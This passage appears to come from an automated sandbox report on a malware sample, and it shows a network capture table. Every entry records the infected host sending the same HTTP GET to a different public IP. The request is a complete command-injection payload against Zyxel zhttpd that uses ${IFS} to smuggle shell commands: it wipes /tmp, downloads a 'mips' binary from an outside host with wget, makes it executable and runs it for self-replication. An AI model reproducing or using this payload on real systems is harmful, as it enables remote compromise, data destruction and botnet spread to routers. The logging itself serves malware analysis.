                                        Mar 31, 2024 09:20:40.335191011 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1637192.168.2.2359286145.113.158.180443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.335228920 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1638192.168.2.235415614.245.16.125443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.335263968 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1639192.168.2.2343838159.57.82.145443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.335315943 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1640192.168.2.2359662220.217.46.245443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.335347891 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1641192.168.2.235605212.242.137.177443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.335400105 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1642192.168.2.2356948220.154.118.40443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.335450888 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1643192.168.2.23518921.65.3.3443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.335472107 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1644192.168.2.234629846.166.135.145443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.335529089 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1645192.168.2.235661232.162.135.133443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.335566044 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1646192.168.2.2351446222.187.114.26443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.335594893 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1647192.168.2.2341138150.26.182.184443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.335648060 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1648192.168.2.235856431.213.232.234443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.335700989 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1649192.168.2.2346700222.28.33.119443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.335732937 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1650192.168.2.2333196122.254.153.231443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.335772038 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1651192.168.2.235248698.240.118.45443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.335800886 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1652192.168.2.2337080190.255.236.115443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.335846901 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1653192.168.2.2349810122.226.37.147443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.335875988 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1654192.168.2.2341502177.134.49.149443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.335918903 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1655192.168.2.234969490.71.122.169443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.335958958 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1656192.168.2.2355856103.118.35.119443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.335994005 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1657192.168.2.2332838153.93.89.207443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.336035013 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1658192.168.2.2340510157.38.98.62443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.336066961 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1659192.168.2.235862679.16.78.155443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.336117983 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1660192.168.2.2353918114.202.120.147443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.336149931 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1661192.168.2.235815467.254.74.112443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.336183071 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1662192.168.2.235628423.246.6.42443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.336225986 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1663192.168.2.2334188218.251.154.223443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.336272001 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1664192.168.2.233387257.134.246.29443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.336301088 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1665192.168.2.2333618158.104.26.157443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.336349010 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1666192.168.2.2347054100.161.194.182443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.336389065 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1667192.168.2.234685464.238.148.64443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.336405039 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1668192.168.2.2340008130.253.118.177443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.336445093 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1669192.168.2.2339170220.161.102.218443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.336477041 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1670192.168.2.2352868110.238.113.18443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.336534977 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1671192.168.2.2355014144.250.138.61443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.336575031 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1672192.168.2.2357442113.136.231.253443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.336600065 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1673192.168.2.2337856128.208.69.110443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.336669922 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1674192.168.2.233472437.40.92.94443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.336689949 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1675192.168.2.2352134111.81.49.24443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.336729050 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1676192.168.2.234763478.133.65.164443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.336771965 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1677192.168.2.2334836104.230.94.149443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.336807966 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1678192.168.2.234522237.159.73.124443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.336850882 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1679192.168.2.23585545.252.14.177443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.336894035 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1680192.168.2.2345184138.114.112.58443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.336935043 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1681192.168.2.2352826220.88.219.251443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.336977005 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1682192.168.2.2348694187.81.161.142443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.337009907 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1683192.168.2.235515838.59.222.91443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.337068081 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1684192.168.2.2353842207.161.36.9443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.337107897 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1685192.168.2.234551874.25.88.205443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.337162971 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1686192.168.2.2359584116.38.215.154443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.337199926 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1687192.168.2.2334534113.145.237.64443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.337240934 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1688192.168.2.2346886219.125.216.158443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.337269068 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1689192.168.2.2348686165.171.103.162443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.337302923 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1690192.168.2.233825682.14.238.135443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.337368965 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1691192.168.2.2355316103.38.95.137443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.337393999 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1692192.168.2.235283224.243.228.38443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.337424040 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1693192.168.2.2336558200.226.44.148443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.337454081 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1694192.168.2.2351216162.136.101.82443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.337502003 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1695192.168.2.233683682.124.94.6443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.337551117 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1696192.168.2.234654461.141.166.149443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.337583065 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1697192.168.2.234411265.86.21.236443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.337631941 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1698192.168.2.2352680190.62.21.57443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.337661982 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1699192.168.2.2359574125.56.37.237443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.337692022 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1700192.168.2.233769672.209.193.134443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.337730885 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1701192.168.2.2336180222.165.70.103443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.337784052 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1702192.168.2.235583062.124.68.224443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.337831020 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1703192.168.2.234963083.0.161.241443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.337871075 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1704192.168.2.2356324143.163.147.169443
                                        TimestampBytes transferredDirectionData
